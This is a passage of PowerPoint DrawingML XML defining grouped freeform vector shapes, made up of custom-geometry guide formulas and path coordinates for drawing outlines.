                  <a:gd name="T33" fmla="*/ 35 h 169"/>
                  <a:gd name="T34" fmla="*/ 36 w 90"/>
                  <a:gd name="T35" fmla="*/ 62 h 169"/>
                  <a:gd name="T36" fmla="*/ 36 w 90"/>
                  <a:gd name="T37" fmla="*/ 62 h 169"/>
                  <a:gd name="T38" fmla="*/ 36 w 90"/>
                  <a:gd name="T39" fmla="*/ 80 h 169"/>
                  <a:gd name="T40" fmla="*/ 36 w 90"/>
                  <a:gd name="T41" fmla="*/ 168 h 169"/>
                  <a:gd name="T42" fmla="*/ 9 w 90"/>
                  <a:gd name="T43" fmla="*/ 168 h 169"/>
                  <a:gd name="T44" fmla="*/ 9 w 90"/>
                  <a:gd name="T45" fmla="*/ 53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0" h="169">
                    <a:moveTo>
                      <a:pt x="9" y="53"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="53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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="168" name="Group 167"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3480768" y="3432859"/>
              <a:ext cx="731907" cy="857019"/>
              <a:chOff x="2414588" y="4352925"/>
              <a:chExt cx="1671637" cy="1957388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169" name="Freeform 70"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2414588" y="4352925"/>
                <a:ext cx="268287" cy="174625"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 709 w 746"/>
                  <a:gd name="T1" fmla="*/ 126 h 484"/>
                  <a:gd name="T2" fmla="*/ 745 w 746"/>
                  <a:gd name="T3" fmla="*/ 273 h 484"/>
                  <a:gd name="T4" fmla="*/ 294 w 746"/>
                  <a:gd name="T5" fmla="*/ 388 h 484"/>
                  <a:gd name="T6" fmla="*/ 310 w 746"/>
                  <a:gd name="T7" fmla="*/ 456 h 484"/>
                  <a:gd name="T8" fmla="*/ 200 w 746"/>
                  <a:gd name="T9" fmla="*/ 483 h 484"/>
                  <a:gd name="T10" fmla="*/ 179 w 746"/>
                  <a:gd name="T11" fmla="*/ 415 h 484"/>
                  <a:gd name="T12" fmla="*/ 32 w 746"/>
                  <a:gd name="T13" fmla="*/ 451 h 484"/>
                  <a:gd name="T14" fmla="*/ 0 w 746"/>
                  <a:gd name="T15" fmla="*/ 320 h 484"/>
                  <a:gd name="T16" fmla="*/ 147 w 746"/>
                  <a:gd name="T17" fmla="*/ 283 h 484"/>
                  <a:gd name="T18" fmla="*/ 84 w 746"/>
                  <a:gd name="T19" fmla="*/ 26 h 484"/>
                  <a:gd name="T20" fmla="*/ 205 w 746"/>
                  <a:gd name="T21" fmla="*/ 0 h 484"/>
                  <a:gd name="T22" fmla="*/ 709 w 746"/>
                  <a:gd name="T23" fmla="*/ 126 h 484"/>
                  <a:gd name="T24" fmla="*/ 530 w 746"/>
                  <a:gd name="T25" fmla="*/ 184 h 484"/>
                  <a:gd name="T26" fmla="*/ 226 w 746"/>
                  <a:gd name="T27" fmla="*/ 115 h 484"/>
                  <a:gd name="T28" fmla="*/ 263 w 746"/>
                  <a:gd name="T29" fmla="*/ 252 h 484"/>
                  <a:gd name="T30" fmla="*/ 530 w 746"/>
                  <a:gd name="T31" fmla="*/ 188 h 484"/>
                  <a:gd name="T32" fmla="*/ 530 w 746"/>
                  <a:gd name="T33" fmla="*/ 184 h 4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46" h="484">
                    <a:moveTo>
                      <a:pt x="709" y="126"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="745" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="709" y="126"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="530" y="184"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="226" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="184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70" name="Freeform 71"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2443163" y="4557713"/>
                <a:ext cx="69850" cy="65087"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 42 w 195"/>
                  <a:gd name="T1" fmla="*/ 178 h 179"/>
                  <a:gd name="T2" fmla="*/ 0 w 195"/>
                  <a:gd name="T3" fmla="*/ 47 h 179"/>
                  <a:gd name="T4" fmla="*/ 157 w 195"/>
                  <a:gd name="T5" fmla="*/ 0 h 179"/>
                  <a:gd name="T6" fmla="*/ 194 w 195"/>
                  <a:gd name="T7" fmla="*/ 131 h 179"/>
                  <a:gd name="T8" fmla="*/ 42 w 195"/>
                  <a:gd name="T9" fmla="*/ 178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5" h="179">
                    <a:moveTo>
                      <a:pt x="42" y="178"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="178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1" name="Freeform 72"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2520950" y="4641850"/>
                <a:ext cx="296863" cy="220663"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 215 w 825"/>
                  <a:gd name="T1" fmla="*/ 451 h 615"/>
                  <a:gd name="T2" fmla="*/ 215 w 825"/>
                  <a:gd name="T3" fmla="*/ 457 h 615"/>
                  <a:gd name="T4" fmla="*/ 767 w 825"/>
                  <a:gd name="T5" fmla="*/ 352 h 615"/>
                  <a:gd name="T6" fmla="*/ 824 w 825"/>
                  <a:gd name="T7" fmla="*/ 494 h 615"/>
                  <a:gd name="T8" fmla="*/ 73 w 825"/>
                  <a:gd name="T9" fmla="*/ 614 h 615"/>
                  <a:gd name="T10" fmla="*/ 0 w 825"/>
                  <a:gd name="T11" fmla="*/ 441 h 615"/>
                  <a:gd name="T12" fmla="*/ 624 w 825"/>
                  <a:gd name="T13" fmla="*/ 0 h 615"/>
                  <a:gd name="T14" fmla="*/ 682 w 825"/>
                  <a:gd name="T15" fmla="*/ 147 h 615"/>
                  <a:gd name="T16" fmla="*/ 215 w 825"/>
                  <a:gd name="T17" fmla="*/ 451 h 6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25" h="615">
                    <a:moveTo>
                      <a:pt x="215" y="451"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="215" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="824" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="451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2" name="Freeform 73"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2595563" y="4859338"/>
                <a:ext cx="238125" cy="227012"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 157 w 662"/>
                  <a:gd name="T1" fmla="*/ 478 h 631"/>
                  <a:gd name="T2" fmla="*/ 157 w 662"/>
                  <a:gd name="T3" fmla="*/ 478 h 631"/>
                  <a:gd name="T4" fmla="*/ 110 w 662"/>
                  <a:gd name="T5" fmla="*/ 472 h 631"/>
                  <a:gd name="T6" fmla="*/ 94 w 662"/>
                  <a:gd name="T7" fmla="*/ 461 h 631"/>
                  <a:gd name="T8" fmla="*/ 73 w 662"/>
                  <a:gd name="T9" fmla="*/ 451 h 631"/>
                  <a:gd name="T10" fmla="*/ 73 w 662"/>
                  <a:gd name="T11" fmla="*/ 451 h 631"/>
                  <a:gd name="T12" fmla="*/ 47 w 662"/>
                  <a:gd name="T13" fmla="*/ 425 h 631"/>
                  <a:gd name="T14" fmla="*/ 21 w 662"/>
                  <a:gd name="T15" fmla="*/ 383 h 631"/>
                  <a:gd name="T16" fmla="*/ 21 w 662"/>
                  <a:gd name="T17" fmla="*/ 383 h 631"/>
                  <a:gd name="T18" fmla="*/ 10 w 662"/>
                  <a:gd name="T19" fmla="*/ 357 h 631"/>
                  <a:gd name="T20" fmla="*/ 5 w 662"/>
                  <a:gd name="T21" fmla="*/ 325 h 631"/>
                  <a:gd name="T22" fmla="*/ 0 w 662"/>
                  <a:gd name="T23" fmla="*/ 299 h 631"/>
                  <a:gd name="T24" fmla="*/ 5 w 662"/>
                  <a:gd name="T25" fmla="*/ 273 h 631"/>
                  <a:gd name="T26" fmla="*/ 5 w 662"/>
                  <a:gd name="T27" fmla="*/ 273 h 631"/>
                  <a:gd name="T28" fmla="*/ 21 w 662"/>
                  <a:gd name="T29" fmla="*/ 252 h 631"/>
                  <a:gd name="T30" fmla="*/ 37 w 662"/>
                  <a:gd name="T31" fmla="*/ 231 h 631"/>
                  <a:gd name="T32" fmla="*/ 63 w 662"/>
                  <a:gd name="T33" fmla="*/ 210 h 631"/>
                  <a:gd name="T34" fmla="*/ 100 w 662"/>
                  <a:gd name="T35" fmla="*/ 189 h 631"/>
                  <a:gd name="T36" fmla="*/ 467 w 662"/>
                  <a:gd name="T37" fmla="*/ 0 h 631"/>
                  <a:gd name="T38" fmla="*/ 535 w 662"/>
                  <a:gd name="T39" fmla="*/ 131 h 631"/>
                  <a:gd name="T40" fmla="*/ 189 w 662"/>
                  <a:gd name="T41" fmla="*/ 304 h 631"/>
                  <a:gd name="T42" fmla="*/ 189 w 662"/>
                  <a:gd name="T43" fmla="*/ 304 h 631"/>
                  <a:gd name="T44" fmla="*/ 157 w 662"/>
                  <a:gd name="T45" fmla="*/ 325 h 631"/>
                  <a:gd name="T46" fmla="*/ 142 w 662"/>
                  <a:gd name="T47" fmla="*/ 341 h 631"/>
                  <a:gd name="T48" fmla="*/ 142 w 662"/>
                  <a:gd name="T49" fmla="*/ 341 h 631"/>
                  <a:gd name="T50" fmla="*/ 137 w 662"/>
                  <a:gd name="T51" fmla="*/ 367 h 631"/>
                  <a:gd name="T52" fmla="*/ 147 w 662"/>
                  <a:gd name="T53" fmla="*/ 394 h 631"/>
                  <a:gd name="T54" fmla="*/ 147 w 662"/>
                  <a:gd name="T55" fmla="*/ 394 h 631"/>
                  <a:gd name="T56" fmla="*/ 157 w 662"/>
                  <a:gd name="T57" fmla="*/ 409 h 631"/>
                  <a:gd name="T58" fmla="*/ 168 w 662"/>
                  <a:gd name="T59" fmla="*/ 420 h 631"/>
                  <a:gd name="T60" fmla="*/ 178 w 662"/>
                  <a:gd name="T61" fmla="*/ 431 h 631"/>
                  <a:gd name="T62" fmla="*/ 194 w 662"/>
                  <a:gd name="T63" fmla="*/ 435 h 631"/>
                  <a:gd name="T64" fmla="*/ 210 w 662"/>
                  <a:gd name="T65" fmla="*/ 435 h 631"/>
                  <a:gd name="T66" fmla="*/ 226 w 662"/>
                  <a:gd name="T67" fmla="*/ 435 h 631"/>
                  <a:gd name="T68" fmla="*/ 263 w 662"/>
                  <a:gd name="T69" fmla="*/ 420 h 631"/>
                  <a:gd name="T70" fmla="*/ 593 w 662"/>
                  <a:gd name="T71" fmla="*/ 252 h 631"/>
                  <a:gd name="T72" fmla="*/ 661 w 662"/>
                  <a:gd name="T73" fmla="*/ 383 h 631"/>
                  <a:gd name="T74" fmla="*/ 157 w 662"/>
                  <a:gd name="T75" fmla="*/ 630 h 631"/>
                  <a:gd name="T76" fmla="*/ 100 w 662"/>
                  <a:gd name="T77" fmla="*/ 509 h 631"/>
                  <a:gd name="T78" fmla="*/ 157 w 662"/>
                  <a:gd name="T79" fmla="*/ 478 h 6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62" h="631">
                    <a:moveTo>
                      <a:pt x="157" y="478"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="157" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="478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3" name="Freeform 74"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2678113" y="4995863"/>
                <a:ext cx="257175" cy="177800"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 714 w 715"/>
                  <a:gd name="T1" fmla="*/ 120 h 495"/>
                  <a:gd name="T2" fmla="*/ 68 w 715"/>
                  <a:gd name="T3" fmla="*/ 494 h 495"/>
                  <a:gd name="T4" fmla="*/ 0 w 715"/>
                  <a:gd name="T5" fmla="*/ 367 h 495"/>
                  <a:gd name="T6" fmla="*/ 640 w 715"/>
                  <a:gd name="T7" fmla="*/ 0 h 495"/>
                  <a:gd name="T8" fmla="*/ 714 w 715"/>
                  <a:gd name="T9" fmla="*/ 120 h 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5" h="495">
                    <a:moveTo>
                      <a:pt x="714" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="68" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="12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4" name="Freeform 75"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2724150" y="5103813"/>
                <a:ext cx="239713" cy="238125"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 546 w 668"/>
                  <a:gd name="T1" fmla="*/ 115 h 663"/>
                  <a:gd name="T2" fmla="*/ 488 w 668"/>
                  <a:gd name="T3" fmla="*/ 152 h 663"/>
                  <a:gd name="T4" fmla="*/ 494 w 668"/>
                  <a:gd name="T5" fmla="*/ 152 h 663"/>
                  <a:gd name="T6" fmla="*/ 494 w 668"/>
                  <a:gd name="T7" fmla="*/ 152 h 663"/>
                  <a:gd name="T8" fmla="*/ 535 w 668"/>
                  <a:gd name="T9" fmla="*/ 152 h 663"/>
                  <a:gd name="T10" fmla="*/ 556 w 668"/>
                  <a:gd name="T11" fmla="*/ 163 h 663"/>
                  <a:gd name="T12" fmla="*/ 578 w 668"/>
                  <a:gd name="T13" fmla="*/ 168 h 663"/>
                  <a:gd name="T14" fmla="*/ 578 w 668"/>
                  <a:gd name="T15" fmla="*/ 168 h 663"/>
                  <a:gd name="T16" fmla="*/ 609 w 668"/>
                  <a:gd name="T17" fmla="*/ 195 h 663"/>
                  <a:gd name="T18" fmla="*/ 635 w 668"/>
                  <a:gd name="T19" fmla="*/ 225 h 663"/>
                  <a:gd name="T20" fmla="*/ 635 w 668"/>
                  <a:gd name="T21" fmla="*/ 225 h 663"/>
                  <a:gd name="T22" fmla="*/ 651 w 668"/>
                  <a:gd name="T23" fmla="*/ 257 h 663"/>
                  <a:gd name="T24" fmla="*/ 662 w 668"/>
                  <a:gd name="T25" fmla="*/ 284 h 663"/>
                  <a:gd name="T26" fmla="*/ 667 w 668"/>
                  <a:gd name="T27" fmla="*/ 310 h 663"/>
                  <a:gd name="T28" fmla="*/ 662 w 668"/>
                  <a:gd name="T29" fmla="*/ 336 h 663"/>
                  <a:gd name="T30" fmla="*/ 662 w 668"/>
                  <a:gd name="T31" fmla="*/ 336 h 663"/>
                  <a:gd name="T32" fmla="*/ 651 w 668"/>
                  <a:gd name="T33" fmla="*/ 362 h 663"/>
                  <a:gd name="T34" fmla="*/ 635 w 668"/>
                  <a:gd name="T35" fmla="*/ 389 h 663"/>
                  <a:gd name="T36" fmla="*/ 615 w 668"/>
                  <a:gd name="T37" fmla="*/ 409 h 663"/>
                  <a:gd name="T38" fmla="*/ 578 w 668"/>
                  <a:gd name="T39" fmla="*/ 436 h 663"/>
                  <a:gd name="T40" fmla="*/ 231 w 668"/>
                  <a:gd name="T41" fmla="*/ 662 h 663"/>
                  <a:gd name="T42" fmla="*/ 152 w 668"/>
                  <a:gd name="T43" fmla="*/ 541 h 663"/>
                  <a:gd name="T44" fmla="*/ 478 w 668"/>
                  <a:gd name="T45" fmla="*/ 331 h 663"/>
                  <a:gd name="T46" fmla="*/ 478 w 668"/>
                  <a:gd name="T47" fmla="*/ 331 h 663"/>
                  <a:gd name="T48" fmla="*/ 509 w 668"/>
                  <a:gd name="T49" fmla="*/ 305 h 663"/>
                  <a:gd name="T50" fmla="*/ 520 w 668"/>
                  <a:gd name="T51" fmla="*/ 284 h 663"/>
                  <a:gd name="T52" fmla="*/ 520 w 668"/>
                  <a:gd name="T53" fmla="*/ 284 h 663"/>
                  <a:gd name="T54" fmla="*/ 520 w 668"/>
                  <a:gd name="T55" fmla="*/ 262 h 663"/>
                  <a:gd name="T56" fmla="*/ 509 w 668"/>
                  <a:gd name="T57" fmla="*/ 236 h 663"/>
                  <a:gd name="T58" fmla="*/ 509 w 668"/>
                  <a:gd name="T59" fmla="*/ 236 h 663"/>
                  <a:gd name="T60" fmla="*/ 498 w 668"/>
                  <a:gd name="T61" fmla="*/ 221 h 663"/>
                  <a:gd name="T62" fmla="*/ 488 w 668"/>
                  <a:gd name="T63" fmla="*/ 210 h 663"/>
                  <a:gd name="T64" fmla="*/ 472 w 668"/>
                  <a:gd name="T65" fmla="*/ 205 h 663"/>
                  <a:gd name="T66" fmla="*/ 462 w 668"/>
                  <a:gd name="T67" fmla="*/ 199 h 663"/>
                  <a:gd name="T68" fmla="*/ 446 w 668"/>
                  <a:gd name="T69" fmla="*/ 199 h 663"/>
                  <a:gd name="T70" fmla="*/ 425 w 668"/>
                  <a:gd name="T71" fmla="*/ 205 h 663"/>
                  <a:gd name="T72" fmla="*/ 388 w 668"/>
                  <a:gd name="T73" fmla="*/ 221 h 663"/>
                  <a:gd name="T74" fmla="*/ 79 w 668"/>
                  <a:gd name="T75" fmla="*/ 425 h 663"/>
                  <a:gd name="T76" fmla="*/ 0 w 668"/>
                  <a:gd name="T77" fmla="*/ 305 h 663"/>
                  <a:gd name="T78" fmla="*/ 472 w 668"/>
                  <a:gd name="T79" fmla="*/ 0 h 663"/>
                  <a:gd name="T80" fmla="*/ 546 w 668"/>
                  <a:gd name="T81" fmla="*/ 115 h 6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68" h="663">
                    <a:moveTo>
                      <a:pt x="546" y="115"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="488" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="115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5" name="Freeform 76"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2855913" y="5280025"/>
                <a:ext cx="206375" cy="190500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 574"/>
                  <a:gd name="T1" fmla="*/ 251 h 531"/>
                  <a:gd name="T2" fmla="*/ 153 w 574"/>
                  <a:gd name="T3" fmla="*/ 283 h 531"/>
                  <a:gd name="T4" fmla="*/ 126 w 574"/>
                  <a:gd name="T5" fmla="*/ 314 h 531"/>
                  <a:gd name="T6" fmla="*/ 116 w 574"/>
                  <a:gd name="T7" fmla="*/ 351 h 531"/>
                  <a:gd name="T8" fmla="*/ 121 w 574"/>
                  <a:gd name="T9" fmla="*/ 367 h 531"/>
                  <a:gd name="T10" fmla="*/ 126 w 574"/>
                  <a:gd name="T11" fmla="*/ 383 h 531"/>
                  <a:gd name="T12" fmla="*/ 153 w 574"/>
                  <a:gd name="T13" fmla="*/ 404 h 531"/>
                  <a:gd name="T14" fmla="*/ 179 w 574"/>
                  <a:gd name="T15" fmla="*/ 409 h 531"/>
                  <a:gd name="T16" fmla="*/ 216 w 574"/>
                  <a:gd name="T17" fmla="*/ 404 h 531"/>
                  <a:gd name="T18" fmla="*/ 336 w 574"/>
                  <a:gd name="T19" fmla="*/ 482 h 531"/>
                  <a:gd name="T20" fmla="*/ 294 w 574"/>
                  <a:gd name="T21" fmla="*/ 508 h 531"/>
                  <a:gd name="T22" fmla="*/ 221 w 574"/>
                  <a:gd name="T23" fmla="*/ 530 h 531"/>
                  <a:gd name="T24" fmla="*/ 184 w 574"/>
                  <a:gd name="T25" fmla="*/ 530 h 531"/>
